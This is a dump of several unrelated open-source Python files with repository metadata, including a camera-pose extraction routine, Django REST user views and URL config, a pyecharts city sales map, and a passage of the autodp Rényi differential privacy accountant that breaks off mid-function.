2022-03-30T05:03:10.000Z
|
2022-03-30T05:03:10.000Z
|
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | null | null | null |
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
|
akathpal/UMD-CMSC733-ComputerVision
|
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
|
[
"MIT"
] | 1
|
2022-03-30T05:03:09.000Z
|
2022-03-30T05:03:09.000Z
|
import numpy as np
import sys
sys.dont_write_bytecode = True
def ExtractCameraPose(E, K):
U, S, V_T = np.linalg.svd(E)
W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
# print("E svd U", U)
# print("E svd S", S)
# print("E svd U[:, 2]", U[:, 2])
R = []
C = []
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
C.append(U[:, 2])
C.append(-U[:, 2])
C.append(U[:, 2])
C.append(-U[:, 2])
for i in range(4):
if (np.linalg.det(R[i]) < 0):
R[i] = -R[i]
C[i] = -C[i]
return R, C
| 21.774194
| 52
| 0.463704
|
import numpy as np
import sys
sys.dont_write_bytecode = True
def ExtractCameraPose(E, K):
U, S, V_T = np.linalg.svd(E)
W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
R = []
C = []
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
R.append(np.dot(U, np.dot(W.T, V_T)))
C.append(U[:, 2])
C.append(-U[:, 2])
C.append(U[:, 2])
C.append(-U[:, 2])
for i in range(4):
if (np.linalg.det(R[i]) < 0):
R[i] = -R[i]
C[i] = -C[i]
return R, C
| true
| true
|
f705b953a933a6e69681d0fcfe62b07584f75861
| 1,058
|
py
|
Python
|
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
app/user/views.py
|
frankRose1/recipe-app-api
|
0fff174ecb59bb06e6b631a33e34984e2f12f68a
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from user.serializers import UserSerializer, AuthTokenSerializer
class CreateUserView(generics.CreateAPIView):
"""Create a new user in the system"""
serializer_class = UserSerializer
class CreateTokenView(ObtainAuthToken):
"""Create a new token for a user"""
serializer_class = AuthTokenSerializer
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class ManageUserView(generics.RetrieveUpdateAPIView):
"""Manage the authenticated user"""
serializer_class = UserSerializer
authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def get_object(self):
"""Retrieve and return authenticated user"""
# authentication_classes would have populated the request with the
# authenticated user if they provided a valid token
return self.request.user
| 35.266667
| 74
| 0.780718
|
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from user.serializers import UserSerializer, AuthTokenSerializer
class CreateUserView(generics.CreateAPIView):
serializer_class = UserSerializer
class CreateTokenView(ObtainAuthToken):
serializer_class = AuthTokenSerializer
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class ManageUserView(generics.RetrieveUpdateAPIView):
serializer_class = UserSerializer
authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
def get_object(self):
return self.request.user
| true
| true
|
f705ba86509d02480a6aad1d5e160ac7369c37b3
| 748
|
py
|
Python
|
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
myblog/urls.py
|
kubruslihiga/djangotutorial
|
c13c5267761a4aaa422271b4220d8e724fccd37a
|
[
"Apache-2.0"
] | null | null | null |
"""myblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 34
| 77
| 0.708556
|
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| true
| true
|
f705bbab14c4d76328f030a10cda3c1c25aff596
| 63
|
py
|
Python
|
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
test.sh.py
|
MarcAntoineAlex/query-selector-1
|
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
|
[
"Apache-2.0"
] | null | null | null |
a = [0, 1, 2]
b = [0, 1]
for a, b in zip(a, b):
print(a, b)
| 15.75
| 22
| 0.412698
|
a = [0, 1, 2]
b = [0, 1]
for a, b in zip(a, b):
print(a, b)
| true
| true
|
f705bbcb1c4c4102c9bcfce19fd7880e846a49e3
| 3,851
|
py
|
Python
|
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | 12
|
2020-09-28T03:25:03.000Z
|
2022-03-20T07:44:09.000Z
|
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | null | null | null |
python业务代码/地图散点可视化/2/plot_city_machine.py
|
RobinYaoWenbin/Python-CommonCode
|
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
|
[
"MIT"
] | 21
|
2020-03-19T00:44:35.000Z
|
2022-01-30T03:46:18.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 7 09:36:45 2019
@author: MyPC
"""
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import math
import pymssql
import numpy as np
import copy
import re
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from pyecharts import Map, Geo , Timeline
def get_data_signalmachine():
df = pd.read_excel('Data.xlsx' , sheet_name='example')
# df.fillna(0 , inplace = True)
# df.set_index('year' , inplace = True)
df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True)
df.rename(columns = {'行标签':'city'} , inplace = True)
df.set_index('city' , inplace = True)
df = df.T
df.rename(columns = {'合计' : 'total'} , inplace = True)
# print(df)
return df
def plot_map(df):
# maptype='china' 只显示全国直辖市和省级
# 数据只能是省名和直辖市的名称
# province_distribution = {'青岛': 22, '龙口': 37.56, '河北': 21, '辽宁': 12, '江西': 6, '上海': 20, '安徽': 10, '江苏': 16, '湖南': 9, '浙江': 13, '海南': 2, '广东': 22, '湖北': 8, '黑龙江': 11, '澳门': 1, '陕西': 11, '四川': 7, '内蒙古': 3, '重庆': 3, '云南': 6, '贵州': 2, '吉林': 3, '山西': 12, '山东': 11, '福建': 4, '青海': 1, '舵主科技,质量保证': 1, '天津': 1, '其他': 1}
# provice=list(province_distribution.keys())
# values=list(province_distribution.values())
years = list(df.index)
geos = []
timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \
is_timeline_show = False )
for index in range(len(years)):
cities = list(df.columns)
cities.remove('total')
values = list(df.loc[years[index] , :])
total_num = values[-1]
del(values[-1])
# print(cities)
# print(values)
geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \
subtitle_text_size = 23 , subtitle_color="white", \
title_color="red", title_pos="center", width=1200, height=600, \
background_color='#404a59'))
# type="effectScatter", is_random=True, effect_scale=5 使点具有发散性
geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\
visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \
is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \
geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \
'济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \
'宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \
pieces=[
{"min":0.1, "max": 50 , "label": "0-50"},
{"min": 51, "max": 100 , "label": "51-100"},
{"min": 101, "max": 200 , "label": "101-200"},
{"min":201, "max": 500, "label": "201-500"},
{"min":500, "max": 2900, "label": ">500"}, ] )
geos[index].show_config()
geos[index].render("xxxx售出数量.html")
# 时间轴定义
timeline.add(geos[index],years[index] )
timeline.render('final_graph.html')
def main():
df = get_data_signalmachine()
# print(df)
plot_map(df)
if __name__ == "__main__":
main()
| 47.54321
| 317
| 0.579849
|
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
import math
import pymssql
import numpy as np
import copy
import re
from sklearn import preprocessing
from sklearn.linear_model import LinearRegression
from pyecharts import Map, Geo , Timeline
def get_data_signalmachine():
df = pd.read_excel('Data.xlsx' , sheet_name='example')
df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True)
df.rename(columns = {'行标签':'city'} , inplace = True)
df.set_index('city' , inplace = True)
df = df.T
df.rename(columns = {'合计' : 'total'} , inplace = True)
return df
def plot_map(df):
years = list(df.index)
geos = []
timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \
is_timeline_show = False )
for index in range(len(years)):
cities = list(df.columns)
cities.remove('total')
values = list(df.loc[years[index] , :])
total_num = values[-1]
del(values[-1])
geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \
subtitle_text_size = 23 , subtitle_color="white", \
title_color="red", title_pos="center", width=1200, height=600, \
background_color='#404a59'))
geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\
visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \
is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \
geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \
'济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \
'宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \
pieces=[
{"min":0.1, "max": 50 , "label": "0-50"},
{"min": 51, "max": 100 , "label": "51-100"},
{"min": 101, "max": 200 , "label": "101-200"},
{"min":201, "max": 500, "label": "201-500"},
{"min":500, "max": 2900, "label": ">500"}, ] )
geos[index].show_config()
geos[index].render("xxxx售出数量.html")
timeline.add(geos[index],years[index] )
timeline.render('final_graph.html')
def main():
df = get_data_signalmachine()
plot_map(df)
if __name__ == "__main__":
main()
| true
| true
|
f705bf3cfd5f5c6cac8ba32067f41aadcc0e38d6
| 34,521
|
py
|
Python
|
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | 2
|
2020-06-11T02:48:41.000Z
|
2020-11-17T07:04:01.000Z
|
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | null | null | null |
autodp/rdp_acct.py
|
jeremy43/autodp-1
|
0a3626f6e1baaefb46715396998d1e8029a659bb
|
[
"Apache-2.0"
] | null | null | null |
"""
This file contains the implementation of the main class object: anaRDPacct --- an analytical moment accountant
that keeps track the effects of a hetereogeneous sequence of randomized algorithms using the RDP technique.
In particular it supports amplification of RDP by subsampling without replacement and the amplification of RDP
by poisson sampling, but unfortunately not (yet) together.
"""
import numpy as np
from scipy.optimize import minimize_scalar
import sys
sys.path.append('..')
import autodp
from autodp import utils, rdp_bank
from autodp.privacy_calibrator import subsample_epsdelta
import scipy
import math
def general_upperbound(func, mm, prob):
"""
:param func:
:param mm: alpha in RDP
:param prob: sample probability
:return: the upperbound in theorem 1 in 2019 ICML,could be applied for general case(including poisson distribution)
k_approx = 100 k approximation is applied here
"""
def cgf(x):
return (x - 1) * func(x)
if np.isinf(func(mm)):
return np.inf
if mm == 1 or mm == 0:
return 0
cur_k = np.minimum(50, mm - 1) # choose small k-approx for general upperbound (here is 50) in case of scipy-accuracy
log_term_1 = mm * np.log(1 - prob)
#logBin = utils.get_binom_coeffs(mm)
log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm))
neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in
range(3, cur_k + 1)]
neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log(
1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1]
neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob)
neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm)
pos_term = utils.stable_logsumexp([log_term_1, log_term_2])
neg_term_3.append(neg_term_4)
neg_term_3.append(neg_term_5)
neg_term_3.append(neg_term_6)
neg_term = utils.stable_logsumexp(neg_term_3)
bound = utils.stable_log_diff_exp(pos_term, neg_term)[1]
return bound
def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local):
# evaulate the fast CGF bound for the subsampled mechanism
# func evaluates the RDP of the base mechanism
# mm is alpha. NOT lambda.
return np.inf
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1)
+ np.minimum(func(2), np.log(4)),
np.log(2) + func(2)),
np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1]
+ 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1]
) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2)
if mm == 2:
return utils.stable_logsumexp([0, secondterm])
# approximate the remaining terms using a geometric series
logratio1 = np.log(prob) + np.log(mm) + func(mm)
logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1)
logratio = np.minimum(logratio1, logratio2)
if logratio1 > logratio2:
coeff = 1
else:
coeff = 2
if mm == 3:
return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio])
# Calculate the sum of the geometric series starting from the third term. This is a total of mm-2 terms.
if logratio < 0:
geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \
+ np.log(1 - np.exp((mm - 2) * logratio))
elif logratio > 0:
geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1)
else:
geometric_series_bound = np.log(coeff) + np.log(mm - 2)
# we will approximate using (1+h)^mm
logh1 = np.log(prob) + func(mm - 1)
logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1)
binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1)
binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2)
tmpsign, binomial_series_bound1 \
= utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2)
+ utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm)
+ np.log(mm - 1) - np.log(2)]))
tmpsign, binomial_series_bound2 \
= utils.stable_sum_signed(True, binomial_series_bound2, False,
utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm)
+ np.log(mm - 1) - np.log(2)]))
remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2])
return utils.stable_logsumexp([0, secondterm, remainder])
def fast_poission_subsampled_cgf_upperbound(func, mm, prob):
# evaulate the fast CGF bound for the subsampled mechanism
# func evaluates the RDP of the base mechanism
# mm is alpha. NOT lambda.
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
# Bound #1: log [ (1-\gamma + \gamma e^{func(mm)})^mm ]
bound1 = mm * utils.stable_logsumexp_two(np.log(1-prob), np.log(prob) + func(mm))
# Bound #2: log [ (1-gamma)^alpha E [ 1 + gamma/(1-gamma) E[p/q]]^mm ]
# log[ (1-gamma)^\alpha { 1 + alpha gamma / (1-gamma) + gamma^2 /(1-gamma)^2 * alpha(alpha-1) /2 e^eps(2))
# + alpha \choose 3 * gamma^3 / (1-gamma)^3 / e^(-2 eps(alpha)) * (1 + gamma /(1-gamma) e^{eps(alpha)}) ^ (alpha - 3) }
# ]
if mm >= 3:
bound2 = utils.stable_logsumexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob),
(mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2),
np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob)
+ (mm-3)*np.log(1-prob) + 2 * func(mm) +
(mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))])
else:
bound2 = bound1
#print('www={} func={} mm={}'.format(np.exp(func(mm))-1),func, mm)
#print('bound1 ={} bound2 ={}'.format(bound1,bound2))
return np.minimum(bound1,bound2)
def fast_k_subsample_upperbound(func, mm, prob, k):
"""
:param func:
:param mm:
:param prob: sample probability
:param k: approximate term
:return: k-term approximate upper bound in therorem 11 in ICML-19
"""
def cgf(x):
return (x - 1) * func(x)
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
#logBin = utils.get_binom_coeffs(mm)
cur_k = np.minimum(k, mm - 1)
if (2 * cur_k) >= mm:
exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1)
exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in
range(2, mm + 1)]
exact_term_2.append(exact_term_1)
bound = utils.stable_logsumexp(exact_term_2)
return bound
s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k))
new_log_term_1 = np.log(1 - prob) * mm + mag1
new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob),
np.log(prob) + func(mm - cur_k))
new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in
range(2, cur_k + 1)]
if len(new_log_term_3) > 0:
new_log_term_3 = utils.stable_logsumexp(new_log_term_3)
else:
return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2)
new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in
range(mm - cur_k + 1, mm + 1)]
new_log_term_4.append(new_log_term_1)
new_log_term_4.append(new_log_term_2)
new_log_term_4 = utils.stable_logsumexp(new_log_term_4)
s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3)
new_bound = new_log_term_5
return new_bound
class anaRDPacct:
"""A class that keeps track of the analytical expression of the RDP --- 1/(alpha-1)*CGF of the privacy loss R.V."""
def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False):
# m_max indicates the number that we calculate binomial coefficients exactly up to.
# beyond that we use Stirling approximation.
# ------ Class Attributes -----------
self.m = m # default number of binomial coefficients to precompute
self.m_max = m_max # An upper bound of the quadratic dependence
self.m_lin_max = m_lin_max # An upper bound of the linear dependence.
self.verbose = verbose
self.approx = approx
self.lambs = np.linspace(1, self.m, self.m).astype(int) # Corresponds to \alpha = 2,3,4,5,.... for RDP
self.alphas = np.linspace(1, self.m, self.m).astype(int)
self.RDPs_int = np.zeros_like(self.alphas, float)
self.n=0
self.RDPs = [] # analytical CGFs
self.coeffs = []
self.RDP_inf = .0 # This is effectively for pure DP.
self.logBinomC = utils.get_binom_coeffs(self.m + 1) # The logBinomC is only needed for subsampling mechanisms.
self.idxhash = {} # save the index of previously used algorithms
self.cache = {} # dictionary to save results from previously seen algorithms
self.deltas_cache = {} # dictionary to save results of all discrete derivative path
self.evalRDP = lambda x: 0
self.flag = True # a flag indicating whether evalCGF is out of date
self.flag_subsample = False # a flag to indicate whether we need to expand the logBinomC.
self.tol = tol
# ---------- Methods ------------
def build_zeroth_oracle(self):
self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)])
def plot_rdp(self):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
x = range(0,self.m,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.show()
def plot_cgf_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.plot(self.alphas, self.RDPs_int)
plt.xlabel(r'$\lambda$')
plt.ylabel('CGF')
plt.show()
def plot_rdp_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.loglog(self.alphas, self.RDPs_int)
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
x = range(1,self.m_lin_max,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.xlabel(r'$\alpha$')
plt.ylabel(r'RDP $\epsilon$')
plt.show()
def get_rdp(self,alphas):
# alphas is a numpy array or a list of numbers
# we will return a numpy array of the corresponding RDP
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
alphas = np.array(alphas)
assert(np.all(alphas >= 1))
rdp_list = []
for alpha in alphas:
rdp_list.append(self.evalRDP(alpha))
return np.array(rdp_list)
def get_eps(self, delta): # minimize over \lambda
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
if delta<0 or delta > 1:
print("Error! delta is a probability and must be between 0 and 1")
if delta == 0:
return self.RDP_inf
else:
def fun(x): # the input the RDP's \alpha
if x <= 1:
return np.inf
else:
return np.log(1 / delta)/(x-1) + self.evalRDP(x)
def fun_int(i): # the input is RDP's \alpha in integer
if i <= 1 | i >= len(self.RDPs_int):
return np.inf
else:
return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1]
# When do we have computational constraints?
# Only when we have subsampled items.
# First check if the forward difference is positive at self.m, or if it is infinite
while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0):
# If so, double m, expand logBimomC until the forward difference is positive
if self.flag_subsample:
# The following line is m^2 time.
self.logBinomC = utils.get_binom_coeffs(self.m*2+1)
# Update deltas_caches
for key, val in self.deltas_cache.items():
if type(key) is tuple:
func_tmp = key[0]
else:
func_tmp = key
cgf = lambda x: x*func_tmp(x+1)
deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2)
self.deltas_cache[key] = [deltas, signs_deltas]
new_alphas = range(self.m + 1, self.m * 2 + 1, 1)
self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) # array of integers
self.m = self.m * 2
mm = np.max(self.alphas)
rdp_int_new = np.zeros_like(self.alphas, float)
for key,val in self.cache.items():
idx = self.idxhash[key]
rdp = self.RDPs[idx]
newarray = np.zeros_like(self.alphas, float)
for j in range(2,mm+1,1):
newarray[j-1] = rdp(1.0*j)
newarray[0]=newarray[1]
coeff = self.coeffs[idx]
rdp_int_new += newarray * coeff
self.cache[key] = newarray
self.RDPs_int = rdp_int_new
# # update the integer CGF and the cache for each function
# rdp_int_new = np.zeros_like(self.RDPs_int)
# for key,val in self.cache.items():
# idx = self.idxhash[key]
# rdp = self.RDPs[idx]
# newarray = np.zeros_like(self.RDPs_int)
# for j in range(self.m):
# newarray[j] = rdp(1.0*(j+self.m+1))
#
# coeff = self.coeffs[idx]
# rdp_int_new += newarray * coeff
# self.cache[key] = np.concatenate((val, newarray))
#
# # update the corresponding quantities
# self.RDPs_int = np.concatenate((self.RDPs_int, rdp_int_new))
#self.m = self.m*2
bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1
if bestint == self.m-1:
if self.verbose:
print('Warning: Reach quadratic upper bound: m_max.')
# In this case, we matches the maximum qudaratic upper bound
# Fix it by calling O(1) upper bounds and do logarithmic search
cur = fun(bestint)
while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8:
bestint = bestint*2
cur = fun(bestint)
if bestint > self.m_lin_max and self.approx ==True:
print('Warning: Reach linear upper bound: m_lin_max.')
return cur
results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2],
options={'disp': False})
if results.success:
return results.fun
else:
return None
#return fun(bestint)
if bestint == 0:
if self.verbose:
print('Warning: Smallest alpha = 1.')
# find the best integer alpha.
bestalpha = self.alphas[bestint]
results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1],
options={'disp':False})
# the while loop above ensures that bestint+2 is at most m, and also bestint is at least 0.
if results.success:
return results.fun
else:
# There are cases when certain \delta is not feasible.
# For example, let p and q be uniform the privacy R.V. is either 0 or \infty and unless all \infty
# events are taken cared of by \delta, \epsilon cannot be < \infty
return -1
def compose_mechanism(self, func, coeff=1.0):
self.flag = False
if func in self.idxhash:
self.coeffs[self.idxhash[func]] += coeff
# also update the integer CGFs
self.RDPs_int += self.cache[func] * coeff
else:
# book keeping
self.idxhash[func] = self.n
self.n += 1
self.coeffs.append(coeff)
# update the analytical
self.RDPs.append(func)
# also update the integer results
if func in self.cache:
tmp = self.cache[func]
else:
tmp = np.zeros_like(self.RDPs_int, float)
for i in range(self.m):
tmp[i] = func(i+1)
self.cache[func] = tmp # save in cache
self.RDPs_int += tmp * coeff
self.RDP_inf += func(np.inf) * coeff
#795010
#imple 100
def compose_subsampled_mechanism(self, func, prob, coeff=1.0):
# This function is for subsample without replacements.
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
# update the coefficients of each function
self.coeffs[idx] += coeff
# also update the integer CGFs
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
def cgf(x):
return x * func(x+1)
# we need forward differences of thpe exp(cgf)
# The following line is the numericall y stable way of implementing it.
# The output is in polar form with logarithmic magnitude
deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m)
#deltas1, signs_deltas1 = get_forward_diffs_direct(func, self.m)
#tmp = deltas-deltas1
self.deltas_cache[(func,prob)] = [deltas,signs_deltas]
def subsample_func_int(x):
# This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1
deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)]
if np.isinf(func(x)):
return np.inf
mm = int(x)
fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local)
fastupperbound2 = general_upperbound(func, mm, prob)
if self.approx ==True:
if fastupperbound2 <0:
print('general rdp is negative',x)
return fastupperbound2
if mm <= self.alphas[-1]: # compute the bound exactly. Requires book keeping of O(x^2)
moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)),
np.log(2) + cgf(j-1)),
np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1]
+ 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob)
+self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments))
elif mm <= self.m_lin_max: # compute the bound with stirling approximation. Everything is O(x) now.
moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1)
+ np.minimum(cgf(j - 1), np.log(4)), np.log(2)
+ cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j)
moments = [moment_bound(j) for j in range(2,mm+1,1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments))
else: # Compute the O(1) upper bound
return fastupperbound
def subsample_func(x):
# This function returns the RDP at alpha = x
# RDP with the linear interpolation upper bound of the CGF
